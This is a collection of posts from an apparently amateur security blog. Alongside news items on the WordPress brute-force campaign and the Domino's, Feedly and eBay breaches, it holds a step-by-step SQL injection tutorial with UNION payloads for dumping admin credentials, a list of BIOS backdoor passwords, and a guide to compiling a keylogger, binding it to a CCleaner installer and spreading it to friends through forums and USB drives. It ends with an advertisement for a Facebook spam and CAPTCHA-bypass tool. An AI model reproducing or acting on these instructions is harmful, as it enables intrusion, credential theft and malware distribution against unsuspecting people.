This is default featured post 1 title

Don't get hooked by phishers.

This is default featured post 2 title

Because we care, we're security aware.

This is default featured post 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara -

This is default featured post 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara -

This is default featured post 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara -

Wednesday, July 9, 2014

WordPress Hack

Security experts have reported a Brute Force attack over the WordPress blogs and thousands of blogs have been reported to be hacked because of the massive attack being done. This attack has been confirmed by the Cloudflare. The attack uses botnet and automated attempts to guess the passwords for the default admin account of the WordPress. Surely! the use of weak passwords and the default admin username for your WordPress is the biggest problem which can become the cause of your blog take-down by the hackers.

Remain Safe From the Massive WordPress Brute Force Attack:
You can easily avoid this attack by following these general and very simple instructions:
Don't use default user name i-e admin to login to your blog because it's the default account which you get when you install WordPress. Be sure to add a new administrator account and change the username of that account to something random.

Don't use weak passwords because passwords like in the dictionary and other language words are damn easy to be guessed by a powerful machine. Make a strong password consisting of numbers and symbols.

Be sure that your WordPress version is up to date and no surplus deactivated themes and plugins are present, as any old file and vulnerable can be a cause of hacked WordPress blog.
Actually the attack isn't that much strong but chaining together the power of various servers and hosting is going to make it real strong against your blog. If the hosting companies accounts are vulnerable and undertaken by hackers then a botnet attack carried by this will be damn more powerful than the zombie laptops attacks.

A recent report has shown that the last attack reported was dependent on the 90,000 IP's and it means how large number of hosting accounts have been compromised and as far as I am concerned they are also making use of other vulnerabilities in the WordPress and website structure though the main attack is reported to be a Brute Forced one.

WordPress team action at it's side:
WordPress is going to roll out a two factor verification for the login process of the CMS and it will make brute force die out completely and almost unusable against the WordPress blog. Unfortunately it's not possible to change the default login directory of the WordPress but once can change his username and password. So go for it!

Restriction remove from google play


I am here this week with a new trick as lots of android smart phone users are complaining about that blocked market for the country restricted users. I personally tried this way and this worked well too! I know you all may be well aware that you can easily enable the access to country restricted market using some third party application but the users are complaining that even these third party application after emulating the sim to another USA carrier doesn’t work well. I had to sort out a solution because last day I just installed Cyanogen Mod and after the flash of Gaps I couldn’t do successful emulation to enable every content of the market for my country. So, I tried every way cleared the cache and emulated every sim but I failed. I was able to reach to application e-g Google Voice Search but was unable to download that, Following was the error on clicking download:-
This Application can’t be downloaded in your country, and So what, I don’t remember it much Open-mouthed smile
Procedure I tried to Unblock the Applications which are country restricted to USA only:-
Download any third party SIM emulator like MarketAccess, Market Enabler etc. Try Googling I can’t give link here without the developer permission Smile with tongue outIf you need help ask in comment will email you!
After that downgrade your upgraded market in case if your ROM had old Google Market when installed/Flashed, Here I am assuming that you had previous version of Market before Upgrading to newer Google Play So in this Case go to Manage Applications and Simply select Google Play and uninstall any updates from there, It will be reverted back to Android Market.
Emulate your Sim using the above mentioned program in first step and Search any country restricted application like Google Maps and try Installing. It will take much time and after couple of minutes download will start
Incase, You have preinstalled Google Play when you purchased a phone with latest ICS release, then please uninstall that using Titanium Backup and then drop comment here, to get the link for Old Market for Android. Well, Ok one link is being posted here, Cheers SmileDownload it and Install it and then emulate the Sim and woa, Its Woking…

Tuesday, July 8, 2014

Dominos Pizza hacked

Dominos Pizza hacked, details of 650k customers stolen 

Hackers who claimed to have compromised the database server of Domino's Pizza have demanded a ransom of €30,000 to prevent the public disclosure of customer's data.

The hacker group going by the name of Rex Mundi said they hacked into the servers of Domino's Pizza France and Belgium.

The hackers have managed to download more than 592,000 customer records from Dominos France and 58,000 records from Belgian website.

They claim the compromised database contained sensitive information such as customer's full names, addresses, phone numbers, delivery instructions, email IDs and passwords. 

The group gave a deadline of 8PM CET for Dominos to pay them.

"If they do not do so, we will post the entirety of the data in our possession on the Internet." 

Feedly Hits DDoS Attacks

Feedly and Evernote Hit by DDoS Attacks, Extortion Demands
feedly hacked
Yesterday, the most popular RSS reader Feedly was down as a result of a large scale distributed-denial-of service (DDoS) attack carried by the cybercriminals to extort money.

On Wednesday, the Feedly was temporarily unavailable for its users. Feedly posted details of the attack at 5:00 AM ET on its blog saying that they were under a Distributed Denial of Service (DDoS) attack and cyber-criminals were demanding money in return for returning the service to its normal operations.

Criminals are attacking feedly with a distributed denial of service attack (DDoS). The attacker is trying to extort us money to make it stop,” Edwin Khodabakchian, founder and CEO of Feedly said in a statement on Wednesday. He also expressed regret, “We want to apologize for the inconvenience. Please know that you data is safe and you will be able to re-access your feedly as soon as the attack is neutralized.

Feedly is a very popular RSS feed service which is available for desktop, iOS and Android devices with around 15 million users and 24,000 paying customers. It is also integrated into hundreds of other third party apps, which offers its users to browse the content of their favorite blogs, magazines, websites and more at one place via RSS feed subscriptions.

Feedly gained its popularity after Google announced the closure of its Google reader service last year. A huge number of RSS Google reader users switched to Feedly. Its popularity and reputation attracts RSS die-hards and cyber-criminals as well.

A San Francisco-based firm confirmed that some bad actors had launched a DDoS attack on its popular site, and were demanding a ransom money to restore the service. But the company refused to pay the amount to criminals which is really a matter of appreciation.

We refused to give in and are working with our network providers to mitigate the attack as best as we can, ” said Edwin Khodabakchian. He added, “We are working in parallel with other victims of the same group and with law enforcement.

For those who are not familiar, a Distributed Denial-of-Service (DDoS) attack is one in which multiple compromised systems attacks a single target system or service to make it unavailable to its intended users. The flood of incoming requests essentially forces the target system or service to shut down, thereby denying service to the system to its legitimate users.

According to the company, the hackers have compromised Feedly’s network resources, but they haven’t gained access to any of its servers, ensuring its users that their data is safe.

At the time of writing, the website was still unavailable with visitors greeted by error messages including ‘408 Request Timeout' and ‘Error 502 Timeout'. But latter, the website informed its users that there is no issue with their browser or the website's CloudFlare content delivery network, whereas the host domain was unreachable at the time.
feedly ddos
After few hours of the attack confirmation, Feedly said it had made some changes to its infrastructure on bringing the website online again. "However, these things take some time to put into place and it may still be a few more hours before service is restored," the company said. "Thank you so much for your patience and for sticking with us."

The popular online notes and web clippings service Evernote suffered a similar attack. It is not yet known whether the two are linked, but Feedly and Evernote work closely together.

DDoS attackers have discovered more powerful ways to attack a web service by exploiting Internet protocols such as DNS, NTP and even SNMP which allow cybercriminals to carry out record breaking DDoS attacks with the use of a little skill and relatively small amount of resources.

Feedly has set up an example for all of us that its really not right to pay the ransom to the bad actors and if you fulfill their demands, you are doing nothing but encouraging them more to carry out more such attacks against you.

Twitter allows GIF

You Can Now Share GIFs on Twitter!

Twitter announced Wednesday afternoon that you can post GIFs that appear within your feed on, Android, and iOS.
You Can Now Share GIFs on Twitter!
That means you’ll be able to see the near-ubiquitous moving images in even more corners of the Web than before. It’s either a blessing or a curse, depending on how prone you are to seizures.
Previously, GIFs were shown inline only on third-party applications for Twitter, such as TweetDeck. Coincidentally, that functionality seems to be temporarily down at the moment. Poor TweetDeck; it’s had a rough couple of weeks. 
We here at Yahoo Tech are dedicated GIF lovers, which is why we’d like to celebrate this news with a good, old-fashioned … GIF PARTY!!!!
That is all.

eBay Hacked

eBay Hacked, Urges All Members to Change Passwords Immediately

The online auction and sales giant eBay posted a message Wednesday morning saying that it had been hacked, urging all of its members to change their passwords.
The company said in a statement that a database containing encrypted passwords had been breached, but that financial data, including credit card information, was stored separately and was still safe. Hackers were able to gain access to eBay employee log-ins, eBay said, which in turn gave them access to the encoded passwords.
eBay says that no unauthorized transactions have yet been made with the information. But if you’re an eBay user, you still definitely need a new password.
“[C]hanging passwords is a best practice,” the statement said, “and will help enhance security for eBay users.”
In the statement, which was unsigned, eBay said that the attack took place between late February and early March. Though the passwords that the hackers gained access to were encrypted, or obscured by a code to prevent easy reading, eBay did say that the hackers were able to access members’ names, email addresses, physical addresses, phone numbers, and dates of birth. 
The real takeaway from this: Change your eBay password (go to My eBay and open the Personal Information link you’ll see on the left). If you use the same password on multiple sites, you’ll need to change those passwords, too, should the hackers successfully break the encryption.
eBay Hacked, Urges All Members to Change Passwords Immediately
And if you’re looking for a strong new password, now is a good time torevisit our guide to creating secure passwords on all your online accounts. 

Saturday, October 20, 2012


SQL Injection Full and Detail Guide and Tutorial - 2012

Here you will find a very detailed, step by step tutorial originally written by  (PhortyPhour) on SQL injection. This is purely for educational purposes and is to be used at the discretion of the reader.

First we have to know what SQL injection is exactly.

SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.

That is the first paragraph of the wikipedia page for SQLi (SQL injection) found here:

I would advise reading the entire page.

What is covered in this tutorial?

Part One - Website Assessment
Section One - Finding a vulnerable website
Section Two - Determining the amount of columns
Section Three - Finding which columns are vulnerable

Part Two - Gathering Information
Section One - Determining the SQL version
Section Two - Finding the database

Part Three - The Good Stuff
Section One - Finding the table names
Section Two - Finding the column names
Section Three - Displaying the column contents
Section Four - Finding the admin page

Now let's begin.

Part One - Website Assessment

In order for us to start exploiting a website we must first know exactly what we are injecting into. This is what we will be covering in Part One along with how to assess the information that we gather.

Section One - Finding a vulnerable website

Vulnerable websites can be found using dorks (I will include a list at the end of this tutorial), either in Google or with an exploit scanner. For those of you that are unfamiliar with the term "dorks", I will try to explain.

Dorks are website URLs that are known to be vulnerable. In SQL injection these dorks look like this:


This will be inputted into a search engine and because of the "inurl:" part of the dork, the search engine will return results with URLs that contain the same characters. Some of the sites that have this dork on their website may be vulnerable to SQL injection.

Now let's say we found the page:


In order to test this site all we need to do is add a ' either in between the "=" sign and the "1" or after the "1" so it looks like this:


After pressing enter, if this website returns an error such as the following:

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home1/michafj0/public_html/gallery.php on line 7

Or something along those lines, this means it's vulnerable to injection.

In the case where you are to find a website such as this:


Then you must use the same technique with adding a ' except it must be between the value (in this case the number) and the operator (the "=" sign) so it looks like this:


There are programs that will do this for you but to start off I would suggest simply to do things manually, using Google, and so I won't post any for you guys. If you feel so compelled to use one anyways. I recommend the Exploit Scanner by Reiluke.

Section Two - Determining the amount of columns

In order for us to be able to use commands and get results we must know how many columns there are on a website. So to find the number of columns we must use a very complex and advanced method that I like to call "Trial and Error" with the ORDER BY command Biggrin

NOTE: SQL does not care whether or not your letters are capitalized or not and I'm just doing it out of clarity, for all it cares your queries could look like this:

Code: CaN I HaZ TeH PaSSwOrDs? PLz aNd ThX

IT DOESN'T MATTER (btw please don't think that was an actual command).

So back to the ORDER BY command. To find the number of columns we write a query with incrementing values until we get an error, like this:

Code: ORDER BY 1-- <---No error ORDER BY 2-- <---No error ORDER BY 3-- <---No error ORDER BY 4-- <---No error ORDER BY 5-- <---ERROR!

This means that there are four columns!


Section Three - Finding which columns are vulnerable

So we know that there are four columns now we have to find out which ones are vulnerable to injection. To do this we use the UNION and SELECT queries while keeping the double null (--) at the end of the string. There is also one other difference that is small in size but not in importance, see if you can spot it.

Code: UNION SELECT 1,2,3,4--

If you couldn't spot the difference, it's the extra null in between the "=" sign and the value (the number).


Now after entering that query you should be able to see some numbers somewhere on the page that seem out of place. Those are the numbers of the columns that are vulnerable to injection. We can use those columns to pull information from the database which we will see in Part Two.

Part Two - Gathering Information

In this part we will discover how to find the name of the database and what version of SQL the website is using by using queries to exploit the site.

Section One - Determining the SQL version.

Finding the version of the SQL of the website is a very important step because the steps you take for version 4 are quite different from version 5 in order to get what you want. In this tutorial, I will not be covering version 4 because it really is a guessing game and for the kind of sites that are still using it, it's not worth your time.

If we look back to the end of Section Three in Part One we saw how to find the vulnerable columns. Using that information we can put together our next query (I will be using column 2). The command should look like this:

Code: UNION SELECT 1,@@version,3,4--

Because 2 is the vulnerable column, this is where we will place "@@version". Another string that could replace "@@version" is "version()".

If the website still does not display the version try using unhex(hex()) which looks like this:

Code: UNION SELECT 1,unhex(hex(@@version)),3,4--

NOTE: If this method must be used here, it must be used for the rest of the injection as well.

Now what you want to see is something along these lines:


Which is the version of the SQL for the website.

NOTE: If you see version 4 and you would like to have a go at it, there are other tutorials that explain how to inject into it.

Section Two - Finding the database

Finding the name of the database is not always a necessary step to take to gather the information that you want, however in my experience folllowing these steps and finding the database may sometimes lead to a higher success rate.

To find the database we use a query like the one below:

Code: UNION SELECT 1,group_concat(schema_name),3,4 from information_schema.schemata--

This could sometimes return more results than necessary and so that is when we switch over to this query instead:

Code: UNION SELECT 1,concat(database()),3,4--

Congrats! You now have the name of the database! Copy and paste the name somewhere safe, we'll need it for later.

Part Three - The Good Stuff

This is the fun part where we will find the usernames, emails and passwords!

Section One - Finding the table names

To find the table names we use a query that is similar to the one used for finding the database with a little bit extra added on:

Code: UNION SELECT 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()--

It may look long and confusing but once you understand it, it really isn't so I'll try to explain. What this query does is it "groups" (group_concat) the "table names" (table_name) together and gathers that information "from" (FROM) information_schema.tables where the "table schema" (table_schema) can be found in the "database" (database()).

NOTE: While using group_concat you will only be able to see 1024 characters worth of tables so if you notice that a table is cut off on the end switch over to limit which I will explain now.

Code: UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1--

What this does is it shows the first and only the first table. So if we were to run out of characters on let's say the 31st table we could use this query:

Code: UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema=database() LIMIT 30,1--

Notice how my limit was 30,1 instead of 31,1? This is because when using limit is starts from 0,1 which means that the 30th is actually the 31st Tongue

You now have all the table names!

Section Two - Finding the column names

Now that you have all of the table names try and pick out the one that you think would contain the juicy information. Usually they're tables like User(s), Admin(s), tblUser(s) and so on but it varies between sites.

After deciding which table you think contains the information, use this query (in my example, I'll be using the table name "Admin"):

Code: UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name="Admin"--

This will either give you a list of all the columns within the table or give you an error but don't panic if it is outcome #2! All this means is that Magic Quotes is turned on. This can be bypassed by using a hex or char converter (they both work) to convert the normal text into char or hex (a link to a website that does this will be included at the end of the tutorial).

UPDATE: If you get an error at this point all you must do is follow these steps:

1. Copy the name of the table that you are trying to access.
2. Paste the name of the table into this website where it says "Say Hello To My Little Friend".
Hex/Char Converter
3. Click convert.
4. Copy the string of numbers/letters under Hex into your query so it looks like this:

Code: UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name=0x41646d696e--

Notice how before I pasted the hex I added a "0x", all this does is tells the server that the following characters are part of a hex string.

You should now see a list of all the columns within the table such as username, password, and email.

NOTE: Using the limit function does work with columns as well.

Section Three - Displaying the column contents

We're almost done! All we have left to do is to see what's inside those columns and use the information to login! To view the columns we need to decide which ones we want to see and then use this query (in this example I want to view the columns "username", "password", and "email", and my database name will be "db123"). This is where the database name comes in handy:

Code: UNION SELECT 1,group_concat(username,0x3a,password,0x3a,email),3,4 FROM db123.Admin--

In this query, 0x3a is the hex value of a colon (:) which will group the username:password:email for the individual users just like that.

FINALLY! Now you have the login information for the users of the site, including the admin. All you have to do now is find the admin login page which brings us to Section Four.

Section Four - Finding the admin page

Usually the admin page will be directly off of the site's home page, here are some examples:


Once again there are programs that will find the page for you but first try some of the basic guesses, it might save you a couple of clicks. If you do use a program Reiluke has coded one for that as well. Search Admin Finder by Reiluke.

And that conlcudes my tutorial! I hope it was helpful to some of you. Remember to keep practicing and eventually you'll have all of the queries memorized in no time!

Comment and Rate!

Also I would like put a commonly used dork list.

Dork List


Monday, October 8, 2012

Bios passwd


Here the list of some BIOS backdoor password for many main board manufacture:

Award BIOS backdoor passwords:

pint------------589589-------- aPAf
J256------------syxz-----------AWARD SW
J262------------shift + syxz---AWARD PW
j332------------TTPTHA-------- AWKWARD

AMI BIOS Backdoor Passwords:

Phoenix BIOS Backdoor Passwords:

Misc. Common Passwords

Other BIOS Passwords by Manufacturer
VOBIS & IBM---- merlin
Biostar-------- Biostar
Packard Bell----bell9
HP Vectra------hewlpack

Pen drive threat

Pen Drives main threat to Cyber Security: Army


New Delhi, Sep 30: Despite a ban, use of pen drives has emerged as the main threat to cyber security in defence forces as it is responsible for over 70 per cent of such breaches in the three Services.
The use of pen drives as an easy-to-carry storage device has increased in the recent past and internal reports have confirmed that over 70 per cent cyber security breaches in the armed forces are due to their unauthorised use, Army officials told PTI here.
"These pen drives, which are mostly manufactured in China, have emerged as a big threat to our cyber security systems," they said.
Fresh cyber security guidelines have been issued by the Army headquarters to protect sensitive military networks from hacker attacks, sources said.
Measures have been taken by the other two services also to tighten their cyber security as IAF also recently issued instructions to its personnel warning them against having any official data on their personal computers and pen drives.
All personnel have been asked to declare their Information Technology assets and have been asked not to have any official data on them, IAF officials said here.
Anybody found violating these instructions in checks by cyber security personnel will draw strict action which may even amount to disciplinary action including court martial, they said.
When asked about the development, IAF spokesperson Wg Cdr Gerard Galway confirmed the steps taken by the Air headquarters to safeguard its cyber assets and secret information.
Sources said generally it is found that officials use pen drive to store official data for use at their personal computers but from there, it is transmitted from their IP addresses to hackers from the 'malware' present in the pen drives.
About a couple of years ago, a Major posted in Andaman and Nicobar Islands was apprehended as it was found that sensitive data was being transferred from his computer.
However, it later emerged that his system had been hacked and spying viruses were transferring information to other computers.
An IAF Junior Warrant officer was also apprehended by officials after he was found in possession of unauthorised CDs carrying official information.
The Navy's Eastern Command was also affected after hacker groups were found to be stealing information from its computers there due to malware put in them by external drives.
As part of efforts to counter cyber attacks, the National Security Council has also been discussing designating certain intelligence agencies under the Defence Ministry for countering cyber offensives against the country.

Friday, September 28, 2012


Check if Ur Ports are Hacked or NOT
A website tells u if your computer ports are hacked or not

This server will now attempt to open several common ports on your computer. The results of these attempts will be displayed on this page as Open, Closed, or Secure:

If your firewall is configured to block a port, and it is operating correctly, you will see Secure and an event will be logged on your firewall.
A Closed port indicates that the port is reachable but there is no program currently accepting connections there.
If the port is indicated as Open there is an application or service on your computer actively accepting connections.

The time to check each port will range from less than a second up to 20 seconds. Ports which are Secure will take the most time and if u are secured after the test ends tells u

Test complete.
No open ports were found
click below link

Thursday, September 13, 2012

Huck fb passwd

Hack facebook password remotely
Hacking Facebook account is very easy and just requires not more than 10 minutes of work. Don't worry i will also tell you how to protect your facebook account or passwords from such hacks and hackers. But for this you must know how hackers hack your facebook account. So first i teach you how to hack facebook account remotely and then i will tell how to protect yourself from this.

So guys lets start hacking Facebook account or passwords....

Steps to hack Facebook account using Keylogger:
1. Creating the Keylogger Server to hack Facebook passwords.
2. Extracting the Icon from installer.
3. Bind the keylogger server with any software setup.
4. How to spread your keylogger or send it to your friends to hack their Facebook accounts or passwords.

Step 1. Creating the Keylogger Server
1. Download the keylogger.

2. Extract the file, Now you will get two folders:
a. First one contains Keylogger and Binder
b. Second Contains resource hacker tool.( to extract the icons from installers).

3. Now open the Keylogger. It contains two files one for gmail email and other for password. For this create one test account on Gmail and enter it's details in this.

4. After entering email and password. Set the time interval usually set 3 mins i.e. after how much time you want to receive logs from the user.
5. Now click on send verification mail. This mail is to test that your keylogger is working correctly or not.
6. After you click this you will receive a confirmation mail on test account which will confirm that keylogger is working.
7. Now click on generate to set the mutex (any secret key to make your keylogger FUD) and then click on compile server.
8. Now save the file to desktop or any other location of your choice. Now your server is ready but it can be easily detected.

Step 2.: Extracting the Icon file from any installer(resource hacker)
1. Open the Resource hacker folder and open the reshacker file.
2. Now go to its menu and open any setup file. Suppose we want to attach our keylogger toCcleaner setup file. So open the Ccleaner setup with resource hacker.
3. Now in menu there is one action button click on it and then click save all resources.
4. Now save all the resources to desktop or any other location of your choice.
5. It consists of two files one is icon file and other is res file . We only need icon file, so you can delete the other file i.e res file.
6. Now we have Icon of installer file(as discussed above Ccleaner setup Icon).

Step 3: Bind the Keylogger server with any software
1. Now Go to keylogger folder and open the Binder.
2. Now Click on + button given below to add files.
3. Now add the keylogger server and the set up of software (i.e. in our case it's Ccleaner setup).
4. Now in menu of Binder, Go to Settings. There select the icon that we have generated in the previous step and set the location of output file as shown in figure.
5. Now again go to File's menu in Binder and click on Bind files.
6. Now your Binded keylogger is ready. Now you have to spread it or send it to the slave that is your friend.

Step4 : How to Spread Keylogger or send it to slave or friend
1. Now you have one Software setup file with keylogger attached with it.(In our case we have Ccleaner setup with keylogger attached with it.
2. Now Spread your keylogger through forums. You might be a member of various forums use them to spread your keylogger in form of software posts. You can use various software's to spread them that users frequently download.
3. Spread it through pendrives or USB hard drives. Suppose a friend asked you for a software give it the software that has keylogger attached with it.
Note: you can also attach keylogger with images also. But that can be detectable by antivirus. So avoid such type of hacking.
So isn't that so easy to hack anyone's Facebook account in just few minutes.

How to protect yourself from these hacks?
Prevention is always better than cure so always follow these steps:
1. Don't use cracked softwares and don't download them from unauthorized websites.
2. Always keep your antivirus and anti-spyware up to date.
3. Always scan the files before transferring them to your USB.
4. Do not allow other users to use your PC i.e password protect it.

fb frnd bomber

Facebook Friend Bomber 2.0.1
1. Mass Facebook Amber Alerts (New)
2. Mass Facebook Friend Requests
3. Mass Facebook Friend Messages
4. Mass Facebook Friend Pokes
5. Mass Facebook Wall Poster
6. 100% CAPTCHA Bypass*
7. Single & Unlimited Licenses
Download: Facebook Friend Bomber 2.0.1


Twitter Delicious Facebook Digg Stumbleupon Favorites